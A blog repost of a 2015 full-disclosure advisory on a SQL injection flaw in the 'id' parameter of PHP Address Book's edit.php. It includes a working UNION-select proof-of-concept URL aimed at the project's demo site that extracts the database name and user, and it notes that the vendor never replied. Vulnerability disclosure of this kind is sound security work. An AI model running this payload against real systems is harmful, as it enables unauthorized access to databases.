2015 m. lapkričio 16 d., pirmadienis

PHP Address Book SQL Injection Vulnerability

## Full Disclosure

#Exploit Title      : PHP Address Book SQL Injection Vulnerability
#Exploit Author     : Rahul Pratap Singh
#Date               : 14/Nov/2015
#Home Page Link     : http://sourceforge.net/projects/php-addressbook/
#Blog Url           : 0x62626262.wordpress.com
#Linkedin           : https://in.linkedin.com/in/rahulpratapsingh94
#Status             : Not Patched

1. Description

"id" field in edit.php is not properly sanitized, that leads to SQL
Injection Vulnerability.

2. Proof of Concept

http://php-addressbook.sourceforge.net/demo/edit.php?id=null' union
select
1,2,concat(0x3c2f7469746c653e,database(),0x3a,user(),
0x3c62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+

## Vendor Response

No reply from vendor
Pranešimą parašė ties

Komentarų nėra:

Rašyti komentarą

Užsisakykite: Rašyti komentarus (Atom)